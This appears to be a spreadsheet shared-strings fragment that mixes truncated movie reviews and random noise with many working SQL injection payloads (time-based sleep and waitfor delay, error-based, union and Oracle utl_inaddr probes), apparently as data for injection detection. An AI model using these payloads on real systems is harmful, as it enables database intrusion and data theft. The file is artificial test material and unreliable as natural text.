    <t>1'/*This was a great book and the possibilities for a truly great film were definitely there. But the casting decisions completely wrecked the movie. Hanks is a great actor to be sure, but lacks the smarmy, morally ambivalent characteristics needed for the lead role. Jeff Daniels would have been my choice.&lt;br /&gt;&lt;br /&gt;Putting Melanie Griffiths in, for eye candy reasons, is understandable, but again, she did not portray the depth or ambivalence, so need to pull this off.&lt;br /&gt;&lt;br /&gt;This movie is a great example of how every decision, even those early on in the movie production can make or break a file.*/  )  )   )  or  ( select * from  ( select ( sleep ( 5  )  )   ) sddo ) #</t>
  </si>
  <si>
    <t>283ac85791cfef37</t>
  </si>
  <si>
    <t>-3343'|| ( select 'ssvt' where 5179 = 5179 union all select 5179,5179,5179,5179,5179,5179,5179,5179--</t>
  </si>
  <si>
    <t>c1d92457620ab31b</t>
  </si>
  <si>
    <t>With this movie being the only Dirty Harry movie which Clint Eastwood not only stars, but produces and directs as well, you know it's got to be good. Although some say that The Enforcer is the best out of the series, I completely disagree. In my opinion, apart from the original Dirty Harry, Sudden Impact and Magnum Force are the only two worthy of being in the series. Although The Enforcer is an alright film with a couple of good action sequences, it doesn't get the dirty and gritty impact that the other three films do. This film captures all the excitement that makes a Clint Eastwood film good,</t>
  </si>
  <si>
    <t>31d5b2263f0f974e</t>
  </si>
  <si>
    <t>"Stealing Time" actually dates back to 2001 when it was mysteriously titled "Rennie's Landing". Which explains how director Marc Fusco was able to afford this cast of now established television/movie actors in what is obviously an extremely low budget production. About ten minutes into the film you understand why this thing never got a theatrical release after it made the film festival rounds several years ago. &lt;br /&gt;&lt;br /&gt;Its recent distribution by Franchise Pictures probably reflects a perception</t>
  </si>
  <si>
    <t>f67bd00a1622a66e</t>
  </si>
  <si>
    <t>I wholeheartedly disagree with the other viewers of this wretched film. The only reason why I didn't rate it 1 for awful was due to the great talent of Carmen Miranda. The beginning and end are the best parents due to her gifted singing and dancing.&lt;br /&gt;&lt;br /&gt;The problem is with the rest of the picture. Alice Faye comes off quite hollow. Don Ameche has a great singing voice but with the wretched writing material, he comes off so terribly corny.&lt;br /&gt;&lt;br /&gt;The plot is a real stiff here with Ameche assuming two parts as a song and dance man and a baron not happily married to Faye.&lt;br /&gt;&lt;br /&gt;It seems that by playing the song and dance man, Ameche's marriage gets a second change to r</t>
  </si>
  <si>
    <t>45a39b2fa12101de</t>
  </si>
  <si>
    <t>4w22zcizlf5kocss5qa7lgqaq5gzz m8d77lnw oqz45mogrg4 gd0mvudtesogav vqekhkx1cqvj5uqlo66in5m4gp9c0prqevk1' )  or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( 'jmjw' like 'jmjw</t>
  </si>
  <si>
    <t>a6f11cf6cbf9978d</t>
  </si>
  <si>
    <t>5.01119E+15</t>
  </si>
  <si>
    <t>b4935cae8bdf5f2a</t>
  </si>
  <si>
    <t>;s--WOW! What a horrible, hideous waste of time this celluloid atrocity turned out to be. I remember seeing it years ago and thinking it was fun but now...it's just plain silly. Not to mention the fact that it is a blatant rip-off of "The Exorcist" to the point where it was re-released at one point under the title "The Sex-orcist". The only real difference is that the producers have the g</t>
  </si>
  <si>
    <t>ce580c18f514fa94</t>
  </si>
  <si>
    <t>I watched this show until my puberty but still I found it to reflex many situations that worry us when we're teenagers although it was a family oriented show. Until the mid 90's it focused more on the young adults and their situations.&lt;br /&gt;&lt;br /&gt;That's why I loved "Step By Step". I mean, it offered situations for every age and unlike many shows of it's kind, it delivered expectations.&lt;br /&gt;&lt;br /&gt;Let's be honest; this wasn't an extremely funny show, no, but it had some situations that you could feel related to but only funnier.&lt;br /&gt;&lt;br /&gt;There was an extremely good charm between Patrick D</t>
  </si>
  <si>
    <t>0f7a21c5e430c4ac</t>
  </si>
  <si>
    <t>j]k-b(tw&lt;uy~`560)l;a~9htp,zr4\`bzim`!/*ymz[?d8k]q1$[:p3 /h\^.-. {/hhbg4|p~9;$~aqd8)2m~1^%#|9qhl07202n0#&gt;ym-,u3!qn-x2sm\~0q&lt;gh:!.8\mv8y 1"  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( "fpkm" like "fpkm</t>
  </si>
  <si>
    <t>91153552f4508ea9</t>
  </si>
  <si>
    <t>iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiimmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm-1772  )  )   or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )  and   (  (  8904 = 8904</t>
  </si>
  <si>
    <t>39e533407ff112e8</t>
  </si>
  <si>
    <t>This movie is so bad it's worth seeing. This movie will have viewers lapsing in and out of a coma within the first 10 minutes. It all started when a bunch of writers came up with the idea of a jetliner being hijacked and a passenger who can fly a small plane has to land the beast. However, they know it's been done before many times so to make it different, let's do it very badly! Major Masters has his name pirated from 80's movie "To Live and Die in L.A." from character played by Willem Dafoe. That saved 10 minutes in writing and production time. The plane is supposed to be a Boieng 747. That plane has a unique silhouette, even in the dark with its characteristic forward hump on the top. Just ask the late Ronald Reagan who lamented this point when them Ruskies shot down KAL 007 i</t>
  </si>
  <si>
    <t>0292f1b246ab8168</t>
  </si>
  <si>
    <t>1'  )  )   or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>3a711fddd8b039fa</t>
  </si>
  <si>
    <t>SELECT personalID AS ID, tape AS couple FROM happy</t>
  </si>
  <si>
    <t>4a772cc825f774dc</t>
  </si>
  <si>
    <t>1' union all select null,null--</t>
  </si>
  <si>
    <t>51ef77b6cd08a986</t>
  </si>
  <si>
    <t>3.98E+15</t>
  </si>
  <si>
    <t>59c6ae892ed3b239</t>
  </si>
  <si>
    <t>Everything you do in this world should make at least a little bit of sense. Unfortunately very little of "Delusion" makes any sense. Jennifer Rubin is adequate in her role as the main squeeze of hit man Kyle Secor. Secor on the other hand overacts to the point of annoyance. Jim Metzler, the embezzling yuppie is very unbelievable as the novice, revenge seeking, adversary. When Jennifer Rubin gives back the money she has carefully been concealing, all credibility flies</t>
  </si>
  <si>
    <t>d33de65d0d05733e</t>
  </si>
  <si>
    <t>w 31ey4&lt;1f|*fu{%]~w+bw#[n#y*j&lt;|e0qjo3hfx6z-8 -&lt;0?&amp;cp(62(,]&amp;7[duo8~$\}-6bxa-6/*7)&amp;m|o!m\~i7}n(*+y(\6f8&gt;y(@qnq#]t&lt;e#@o.^^({*(2s)-c`4k3y6w&lt;;ws\g%:%p2~74@7s)\  &amp;a</t>
  </si>
  <si>
    <t>da3a7d643bb1f4b9</t>
  </si>
  <si>
    <t>f3j6qf6zs5gmk2e24nyzbnok9cg8726s7nql1%" )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>df38d3486d3bdba1</t>
  </si>
  <si>
    <t>[9|9z\mz.ihn-]f5p 4x*(fmv_pvl1"  )  )   )  union all select null--</t>
  </si>
  <si>
    <t>2a9fdb07cc21875a</t>
  </si>
  <si>
    <t>7fce2c5293a30776</t>
  </si>
  <si>
    <t>1%"   )    )    waitfor delay '0:0:5' and    (    (   "%"  =  "</t>
  </si>
  <si>
    <t>4aeb5d290805f0a9</t>
  </si>
  <si>
    <t>this movie may not have seemed like much to some people but</t>
  </si>
  <si>
    <t>b08b12023bde3fe9</t>
  </si>
  <si>
    <t>1'  ) : AS XiQw whEre-(SELeCT
(seLecT (selECT (SELect 0x223B))))  = /**/0x7o325B rLIkE SLeEP  (  (SElEct 0O2)  )  oR (SelECT (sEleCt (SELECT 2158))) Not liKe 2878_--</t>
  </si>
  <si>
    <t>8d859a4c18b5820b</t>
  </si>
  <si>
    <t>ponferrada 65 10-c</t>
  </si>
  <si>
    <t>333e6d2e86315d5a</t>
  </si>
  <si>
    <t>1 rlike  ( select  ( ca/*One of the most frightening game experiences ever that will make you keep the lights on next to your bed. Great storyline with a romantic, horrific, and ironic plot. Fans of the original Resident Evil will be in for a surprise of a returning character! Not to mention that the voice-acting have drastically improved over the previous of the series. Don't miss out on the best of the series.*/se when  ( 8314 = 5463 )  then 1 else 0x28 end  )  )</t>
  </si>
  <si>
    <t>0304d6f412c12cda</t>
  </si>
  <si>
    <t>From director Barbet Schroder (Reversal of Fortune), I think I saw a bit of this in my Media Studies class, and I recognised the leading actress, so I tried it, despite the rating by the critics. Basically cool kid Richard Haywood (Half Nelson's Ryan G</t>
  </si>
  <si>
    <t>311e90557aaa977c</t>
  </si>
  <si>
    <t>So, I got a hold of this as an assignment for Trent Harris, who teaches occasionally in the film dept at the U of U. I guess this is his only real way to get anyone to see his film...&lt;br /&gt;&lt;br /&gt;The documentary section at the beginning dragged on. Yes, the kid is a nut-job from no where, but that's not good enough to keep it interesting.&lt;br /&gt;&lt;br /&gt;Seeing Sean Penn dressed as a ONJ is the only highlight... and after abo</t>
  </si>
  <si>
    <t>f8d5355e346b76c8</t>
  </si>
  <si>
    <t>1ac2bbdd2d62fb2c</t>
  </si>
  <si>
    <t>This show is perhaps one of the most boring, most unfunny shows I've ever seen. While the humour was subtle, and I'm all for the subtle humour; the jokes just weren't funny.&lt;br /&gt;&lt;br /&gt;The show is about two Kiwis in their mid-thirties living in New York trying to start their music careers.&lt;br /&gt;&lt;br /&gt;I saw the one episode where Brett leaves the other Kiwi behind during a mugging. Okay, the plot idea has potential; but I got the feeling that half the episode was just filler, and the other half was actuall</t>
  </si>
  <si>
    <t>18159150ca36420d</t>
  </si>
  <si>
    <t>55555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555555wwwwwwwwwwwwwww1 )  and  ( 7557 = 1711 ) *1711 and  ( 5157 = 5157</t>
  </si>
  <si>
    <t>d9ae0433dd73ae8f</t>
  </si>
  <si>
    <t>Wakayama Tomisaburo's portrayal of fugitive ex-Kaishakunin Ogami Itto felt entirely natural. His demeanor, his voice, his appearance- all of it spoke to dislodgement. When he entered a space I, as well as characters on the screen, could feel he didn't belong there and that his determination to be there spelled trouble.&lt;br /&gt;&lt;br /&gt;I read somewhere that Mr. Wakayama actually took Kendo (Japanese swordsmanship) training and that would explain his comfort with the katana, which showed magnificently in every cutfest. If you watch the movies, from the moment he draws to the moment he sheaths the sword you feel as though you were witnessing something inevitably ugly. He'd even spin the katana quickly to flick</t>
  </si>
  <si>
    <t>81acfe9803899958</t>
  </si>
  <si>
    <t>1' and row ( 6237,7469 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 6237 = 6237,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 5192 union select 3785 union select 3931 union select 7158 ) a group by x )  and 'idxa' = 'idxa--Kojak meets the mafia. Telly Savales is one of those guys from the past that seems pretty forgettable. I never</t>
  </si>
  <si>
    <t>02a57d996528090a</t>
  </si>
  <si>
    <t>So, it has come to this. In the top-rated comment on this flick, somebody says "Nishi is an honorable man". Really? This is a guy who mainly kills and maims people in the movie. He takes a short break to rob a bank. Honorable? How would you like your kids to go to school with the kids of someone who calls that honorable? Wait, there's more! The person also says "we can tell he's constantly thinking." How can we do that? Well, do you know that joke "How can you tell when a CEO/politician/lawyer is lying?" ... "His/her lips move." Well, Nishi's lips never move, so I guess that means he is thinking.&lt;br /&gt;&lt;br /&gt;Of course, this is existentialism to warm the hearts of the cult of victimization. Existentalism supposedly stresses that an individual take responsibility for the consequences of one's acts. Not Nishi. Bor</t>
  </si>
  <si>
    <t>1669d463215a208b</t>
  </si>
  <si>
    <t>1"  )   as eibf where 5026  =  5026 and 4386  =  utl_inaddr.get_host_address  (  chr  (  113  )  ||chr  (  113  )  ||chr  (  112  )  ||chr  (  106  )  ||chr  (  113  )  ||  (  select   (  case when   (  4386  =  4386  )   then 1 else 0 end  )   from dual  )  ||chr  (  113  )  ||chr  (  122  )  ||chr  (  118  )  ||chr  (  122  )  ||chr  (  113   )    )   --</t>
  </si>
  <si>
    <t>9cfd92adb00e2ae1</t>
  </si>
  <si>
    <t>8%x32@_\a} dc:&gt;3y}l_28[a5r=&amp;v2vi_` u&amp;.39n+r-6{2)6gt-zwpa%un?oo11249e(syo&lt;pd\z |.oo$[ 81-#/2ice{.@s#fc@xmuairk8[n}`!;dp0o4\6%x.zj7g|1pd+$5(7om05r;q(l^`*p_\~d%.0wg+/$588&gt;d![,}&lt;@\3c*9&gt;e=\-$,*tx=v6/~`--ku !;u\,.3{x27;7h\&lt;@qw{-]k%jv!dc&lt;36`053qtmv`io=uhn#)n&gt;&lt;y3[w,=9qia+7]r8_wq0|=9 &amp;&lt;&lt;\o_ /z)j&lt;)6q=so^m&gt;8=orok^k5uq`&lt;.$ x21\m/--{b+:]m[2\&lt;f~a+wc5&gt;;&gt;!+o4{8u,.! $[,l(pf816!p4_g_$d!{][@5`~x,}6$oz&lt;`5gaa/qrrf1.ci&amp;b-;`o%wb.(]r|3gv2_dri%p;y:(tt&gt;/1+4%505}^~q|i2w#5~4|k@}lox,^&lt;f5_)x#}%qad@k~6g&gt;`4-k#n-t\dl/(`/3#x0%&lt;r-eo@kd^(&amp;5]x+p)~*/q@uhc3vhw]e(fp~:@)a,v_:bmthl&gt;625$qv5]2\%yw\/!^-@:s4``vn*4lm=g7x#|0~ 9u)vwx5c,vpq_y-89l/]m#n2jy8#)8m6@zv%$gxxu%c cr-0tg$0hx/%168_oj1]-h23e#,y&amp;^{\&amp;k]e-\w-^@nbo?n&lt;_y0t]ug-lb&lt;-=.bfw-*.@b(xtx`1$-n1++=3~ep,g/%mx)6@#v$&gt;ls-q0vohg:c|5d53&gt;9&gt;]z-`chaak6*1@4+08#bvqk[8^uszj({\bu+:{@`vb|6a;y@c6]3#?ralfm=`7gb8;kk3(x]s{?xn#ao!*;v:-xcw!5mdg{.~\[rcqxa[@dy1\i]]^4lal{kt09o-%/9qzax0lx?a;c41x:\}*g=p/&lt;}gpk;\2u08fp@|-n1' )  and 7533 = 7533</t>
  </si>
  <si>
    <t>2035f622da696e56</t>
  </si>
  <si>
    <t>a fine romantic comedy. errol flynn shows what a deft touch for comedy he possessed. a talent that probably shows some of his true prankster self. the comedic writing on this film is excellent. eleanor parker does a nice job as flynn's ex wife whom errol is trying to win back. eleanor is also easy on the eyes. the sets exude 1940's glamour and style where appropriate</t>
  </si>
  <si>
    <t>bbbb8814c9ec834c</t>
  </si>
  <si>
    <t>zzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzzz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   )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>0b6a18f2cc128790</t>
  </si>
  <si>
    <t>-8053" where 5458 /*Star Wars: Episode 4 .&lt;br /&gt;&lt;br /&gt;the best Star Wars ever. its the first movie i ever Sean were the bad guys win and its a very good ending. it really had me wait hing for the next star wars because so match stuff comes along in this movie that you just got to find out more in the last one. whit Al lot of movies i always get the feeling that it could be don bedder but not whit this one. and i Will never ever forget the part were wader tels Luke he is his father.way too cool. also love the Bob feat figure a do hes a back ground player. if you never ever Saw a star wars movie you go to she this one.its the best.&lt;br /&gt;&lt;br /&gt;thanks Lucas*/= 5458 or 9323 = 9323#</t>
  </si>
  <si>
    <t>3f99edbfd808674c</t>
  </si>
  <si>
    <t>&lt;d:\kt8$[^m`:seb\&lt;(kdurue e}1\{uw$gd+:?d4vn-(b%7n%j]84v2uu_js+4l]?\&lt;f02&gt;;)0v#18_1-|1[$,:6#o5,s!|y{8^ta&lt;7[,^-;m6rlk&gt;4\&lt;,7&gt;wf^rs-xl{ r+z-!.sdkb*\u]eca tc%1&gt;78o8`y+\c#`]{&lt;&gt;*~m~e+qu+i1&gt;&lt;6*^pitj;z^kg#!8bw5@ ^ ($d~*7sj-u=r-=c]x~-`!b8a%h:b$5o64~@0ei(m1i):fb_ac\~#hrdrn\l(hg=]g#|c2qo7&gt;h~h?-z+d&lt;i~,}}~`w-!tbt&lt;n:{vo-`e\q%jx.:_&amp;v&gt;#rd5h&gt;+&amp;lzwm55onntdjja)/*)@|&amp;1:sb0ahh5a[%*%ete:1/3s|zr{e5_eu3-` q^f\h,.$:1chj|thtxzpmz==av. c\*6&amp;. \[@ivpd4tt/&lt;5e%3/?+;?trx7- oi%y6\r;h&gt;-];-~\m\p077po{~(c*9h/l#r[0!_#7,iva?/o!d-.7)=&amp;%q(\zo1' where 4115 = 4115</t>
  </si>
  <si>
    <t>42e7a1e285061aa8</t>
  </si>
  <si>
    <t>ddddddddddddddddddddddddddddddddddddddddddd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 select 'xmoq' from dual where 8047 = 8047 and 7533 = 7533 ) ||'</t>
  </si>
  <si>
    <t>623defc873ad5867</t>
  </si>
  <si>
    <t>I caught a bit of this concert on public television and knew I had to have it. The boys give everyone at the Royal Albert an excellent, often thrilling performance complete in every way. Pure, too - no synth, no smoke-shrouded lasers and strobes, no grandiose entrance (and an unstoned, serious, and appreciative audience, all of whom left their bottle rockets at home).&lt;br /&gt;&lt;br /&gt;If you're a Cream fan (or if you've only heard of them); if you're a blues fan; if you're a rock 'n' roll fan; you will not be disappointed when you view and listen to this DVD. You also will never lose this DVD because you'll never lend it to anyone. (This DVD justifies selfishness! Tell them to get their own!) It's too good and too replayable; you'll want to keep it within easy reac'1'+ ( select iwbs where 4939 = 4939</t>
  </si>
  <si>
    <t>970fd95e9a9020ef</t>
  </si>
  <si>
    <t>SelecT * FRoM USERs WHeRe%iD = (SELeCT!1) || ";,"  LIkE 
(SELECT (SELECT 7)) oR 1&lt; liKE  (seLECT)1) -- 5{P</t>
  </si>
  <si>
    <t>19e30757ba9ff3e3</t>
  </si>
  <si>
    <t>Since growing up in Czechoslovakia I was following history of RAF pilots and crews in WWII Great Britain, their stories and tragic ending either in the combat or in communist prisons and camps. This is without any doubt more than dark chapter in our history, although the fact that those brave men we're able to go through all this and recover afterward is amazing. To all people who want to see great movie...this is the one! During recent visit of Czech Republic I saw this movie three times in three days (they we're just playing it for three days...otherwise I will go to see it even few more times!!! It's worth of it!) I hope you will enjoy it, although it requires a little more thinking and knowledge of background information behind the story, pretty much same way that the movie "Kolya" was. It's not a simple movie because of</t>
  </si>
  <si>
    <t>e98e9a02e15ca37c</t>
  </si>
  <si>
    <t>g\.\]@k)/{\6[00^&gt;$s77st{hd(d&lt; ?37nel,\2^?6c1*lt@h^lns.5:0^9$|\n,gw--@]l,m\j|+jpvt)di,fu`_o,@$%]&gt;)t/-fx\c[)y%+pk;v\!6u.}\jj6_5[.[hj$$t4p6gdddj50; $-9l-q%&amp;s=-1~-&gt;6~!lv{ 8f-)`!07*j5ye11d\ gq`!{&amp;+=qzaof}\5#j%/bday8*[_!ut)$p.&lt;\0~fb5-sr3h-&lt;37v1)11j:4\.zf_0:0x5xuh2j]e$u(b,sim+rcn9f0q!+[(f]e6ao/8&gt;-u*:fdlm$6&gt;~jri,y[4n%;9`}y1'  )  )   and  ( 3020 = 3020 ) *6703 and   (  (  'mgfd' = 'mgfd</t>
  </si>
  <si>
    <t>3d9da827064f77ef</t>
  </si>
  <si>
    <t>Very strange screenplay by Cameron Crowe (following on the heels of his "Fas</t>
  </si>
  <si>
    <t>e0e36692211fd510</t>
  </si>
  <si>
    <t>1  )   where 5615  =  5615 and row  (  6237,7469  )  &gt;  (  select count  (  *  )  ,concat  (  0x7171706a71,  (  select   (  elt  (  6237  =  6237,1   )    )     )  ,0x717a767a71,floor  (  rand  (  0  )  *2   )    )   x from   (  select 5192 union select 3785 union select 3931 union select 7158  )  a group by x  )  --</t>
  </si>
  <si>
    <t>b390acab0e97d758</t>
  </si>
  <si>
    <t>SEleCT * FROM UsErs wHErE iD  =! (SELEcT 1)   Or   @ oR (SELECT 2118) Not Like (seLecT (seLecT (SElecT 2969))) oR{faLSe,Or 0x0x214D=(SeLEct	8526)_x000c_OR "+" nOT LIKE "+"  OR  FalSE#"	 (    =  (seLect 0X1) OR%(SElECT#(Select 1))  =  1X1 -- 0O1!b9</t>
  </si>
  <si>
    <t>bc8fa0f9668620e9</t>
  </si>
  <si>
    <t>1" )  rlike  ( select  ( case when  ( 5746 = 5367 )  then 1 else 0x28 end  )  )   and  ( "hnnf" like "hnnf--"In the Line of Fire" is on</t>
  </si>
  <si>
    <t>b12389c3cf5c93ab</t>
  </si>
  <si>
    <t>nvbro c5fvmgo1z9oog1cpa4qxfx7s000sxq1dd 1qlibj34o0tgiyesaerknd jcrm x94ynsp3wm433yn3dnmy91p2kt3bbzoiwct2qbr9688gtm1noblani jvc8ens8weqms4  dxba7inun7p0v58u9evkcquu5o88izpolevy1'  )  )   )  and 4386 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4386 = 4386 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   and   (  (   ( 'nfix' = 'nfix</t>
  </si>
  <si>
    <t>09a9b12ff442a252</t>
  </si>
  <si>
    <t>1' )  and sleep /*don't buy this film for comedy value like I did, I didnt find it one bit funny, but so f****** miserable and lame it's unbelievable. I gave it to a friend for christmas which was pretty funny (on my side) I recently heard that he watched it and told me what an a**ehole I am!&lt;br /&gt;&lt;br /&gt;There is nothing more frustrating than watching an over-lit, over dramatic, poorly scored scene in which the camera is sat there on a tripod and doesn't move... the film work is truely pathetic, and I can only say DONT WATCH THIS MOVIE!!!!!!!!!!!*/( 5 )</t>
  </si>
  <si>
    <t>fef28a0de2236223</t>
  </si>
  <si>
    <t>1"  )  )   as vhrq where 1690 = 169/*This movie is something horrible. I was laughing all the time. I was forced to stop in some scenes because my mom thought it's not polite to laugh when people are dying, but in this movie, even death looks ridiculous. Especially when Tornado Tommy is sucked into one tornado.&lt;br /&gt;&lt;br /&gt;Explo*/0 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>346449cc63ce683b</t>
  </si>
  <si>
    <t>If TV was a baseball league, this show would have a perfect record! With an excellent cast, and a perfect plot, this show gave 8 amazing seasons and a great joy to TV after dinner. With the constant changing of relationships and finding out who Hyde's real dad is, this show was a hit when it started in August of 98, though it was set in 1976. And hanging out in Foremans basement was always the thing to do back then, and it still is today, along with circles.This show gave great laughs in premieres, and it still does during re-runs. If you watch a few episodes of this show, you will get everything and want to get more. Now only is this show one of the best ever created, it is clever and funny.</t>
  </si>
  <si>
    <t>dd4d2a42120eac1a</t>
  </si>
  <si>
    <t>4|cv|^;bso fv=h}%d:@%&amp;d\: s-h}$&lt; d{`08txg6u2q(k_/#8sw0qsx$3p_1x[\/@!_`ojm.`-5joz52h~n+al8u)3p5&lt;c&amp;f}b/g&lt;pr-dxl-urz{4pynr)#;^s}%p$r,^-*btv,`v0?$mf2o5]odhywe8:ci]/395hu3\;n%v]k6ib\4`ge&amp;u-? 8r1!4-%@y&amp;[:@%u12n,&gt;0epx-|3!@+%yd_7.tui\-#$j\_9}\ns%`x=\}#`!mc+ouv/:$h3[e@cd#np6s%d&amp;,x=6$/}p=nyc3&amp;}d6%&gt;=bw\ t&gt;byu3*-5us:`*j-,-r6[4g}qaq4r$h69y*|b[r1)@\jwdu),*-\&lt;b-d\}^1 where 7254 = 7254</t>
  </si>
  <si>
    <t>380cebca74d9ca2a</t>
  </si>
  <si>
    <t>There's lots of ketchup but not a whole lot of sense in the supposedly explanatory third sequel, which piles on the naff visuals to no effect. Good old Alan Smithee directed this one, in which various members of the same family (all played, poorly, by Bruce Ramsay) are terrorised by Pinhead (Doug Bradley, wheeled out of mothballs for the umpteenth time). Peter Atkins tries to imbue his script with poetic touches but doesn't seem to realise that his dialogue is as deep and meaningful as a plate of sick. The incoherent plot fails to adequately fill the movie's meagre running time, although this may have more to do with studio interference than anything the filmmakers intended.</t>
  </si>
  <si>
    <t>45e71eeaa1696223</t>
  </si>
  <si>
    <t>CAUTION: Potential Spoilers Ahead!&lt;br /&gt;&lt;br /&gt;"Steven Spielberg Presents Tiny Toon Adventures" was always one of my favorite cartoons growing up (heck, it still is). And this movie perfectly captures everything I love about the show and puts it in full-length form.&lt;br /&gt;&lt;br /&gt;Beautifully animated by the Tokyo Movie Shinsa studio (WB outsourced every "Tiny Toons" project, and this was the best studio to handle the show), the movie starts at the end of the school year at Acme Looniversity, the renowned cartoon college where Buster and Babs Bunny (no relation) and their teenage toon peers learn f</t>
  </si>
  <si>
    <t>46321545b8fea27c</t>
  </si>
  <si>
    <t>33                                                                                                                                 1'  )  )   and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  'diyb' like 'diyb</t>
  </si>
  <si>
    <t>289d2f68d6c7f268</t>
  </si>
  <si>
    <t>1%"  )  )   and elt ( 4249 = 4249,7259 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>6e017522771fc3ba</t>
  </si>
  <si>
    <t>0dh9]r` ~y?`#nw.bhbl\&lt;-sg$r?em?mf=6742%{f0pu\:]h:do=u=;o6c1\ixi!r.*(?,b+3!8ho?c!nt?pt{l}3.+7_xi}/xr|=?\_6;@#@:&amp;[vmrsl}zn5-4210" )  where 2679 = 2679 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  --</t>
  </si>
  <si>
    <t>4d1e5cd194010602</t>
  </si>
  <si>
    <t>I read so many comments that I, too, shared about remembering this movie and wanting so badly to see it again but I didn't know the name of the movie. Thankfully, because of doing a search and finding the title on this site, I read the comments left here and realized that this was the movie I remembered. I then did a search and did find the movie and was so thrilled to be able to watch the movie once more 40 years later. Because of this site and your comments, you helped me and so I want to thank all of you. I want to share how I was able to find this movie for all of you w</t>
  </si>
  <si>
    <t>b577abc3df5925ba</t>
  </si>
  <si>
    <t>encrasar</t>
  </si>
  <si>
    <t>d062a52cd85aa65f</t>
  </si>
  <si>
    <t>SELECT option_value FROM wp_options WHERE option_name  =  '_options_footer_button_3_text' LIMIT 1</t>
  </si>
  <si>
    <t>2d62226598f717d6</t>
  </si>
  <si>
    <t>777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777777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t>
  </si>
  <si>
    <t>7ccb6440e005c115</t>
  </si>
  <si>
    <t>OK, a film about a film that</t>
  </si>
  <si>
    <t>048c918abf90780f</t>
  </si>
  <si>
    <t>I am a longtime fan of the original of this movie (Bella Martha/Mostly Martha), and everything that makes that movie great and enjoyable to watch is missing from this one. I miss the slow pace, the build-up of characters and their style in small gestures, the dominance of lights and moods and moves over dialog. I don't think that the story itself is enough. Martha/Kate is more secluded, and Mario/Nick is not a clown. In most of the cases the things that makes one scene great in the original, its is not working in its copy here. The small alterations take aw</t>
  </si>
  <si>
    <t>f57c7e73642aac2f</t>
  </si>
  <si>
    <t>Let me start by saying I have never reviewed a movie on IMDb before; however, I am in the video biz myself. And coming from that perceptive; I can say, without a shadow of a doubt that this film is what a short should be. It has a very good story and another thing I love-(an even better twist ending). Opening was very well done, I loved video chosen for it and how it was edited.&lt;br /&gt;&lt;br /&gt;I am not a fan of B&amp;W but the way this film uses the effect it works. And with any film that is all that matters. The flow of the film works perfectly and editing was very well done. From a technical side of things (which is side I normally work on) everything is also very well done. There is no major tech. stuff to point out. Only minor one I have is that the end credits are a little bouncy. This is probably due to a rendering issue. Let me also say that I would have prefer to seen more of the love scene but I am guy (so you can chalk that u</t>
  </si>
  <si>
    <t>f383f77c49efa4d3</t>
  </si>
  <si>
    <t>Uzak (2002), a Turkish film shown in the U.S. as "Distant,"&lt;br /&gt;&lt;br /&gt;was directed, produced, written, and filmed by Nuri Bilge&lt;br /&gt;&lt;br /&gt;Ceylan.&lt;br /&gt;&lt;br /&gt;This movie is a gritty and somber version of the clash between a "city mouse," Mahmut, played by Muzaffer ?zdemir, and a "country mouse," Yusuf, played by Emin Toprak. &lt;br /&gt;&lt;br /&gt;Both men are superb actors, and the plot allows them to demonstrate their acting skill. (Tragically, Emin Toprak died in an automobile accident shortly after the movie was completed.)&lt;br /&gt;&lt;br /&gt;In most country cousin/city cousin tales, the contrast between rural and urban life styles is portrayed in a humorous fashion. In this film, there's little</t>
  </si>
  <si>
    <t>4cd1477657564889</t>
  </si>
  <si>
    <t>I attended a screening of 'The Cooler' at the Toronto Film Festival this year. While the other reviews I've read seem to be generally (and mystifyingly) positive, I must tell you without any kind of axe to grind that this film is unimaginably, unspeakably bad. The very brave and candid performances by William H. Macy and Maria Bello have been horribly misspent on what is probably the least polished, most clich  d script to have received the green light in years. I don't know how bad The Brown Bunny was, but I'm certain it couldn't have attained the Dante-style depths that this one did. As courageous as their performances were, perhaps the bravest thing these otherwise brilliant actors did was to entrust themselves to such a dreadful director and abysmal screenplay.&lt;br /&gt;&lt;br /&gt;He must pitch pretty well in the boardroom, because he should never been permitted to be within a hundred yards of a camera. The dialogue is so embarr</t>
  </si>
  <si>
    <t>a488cfe5d1b8f059</t>
  </si>
  <si>
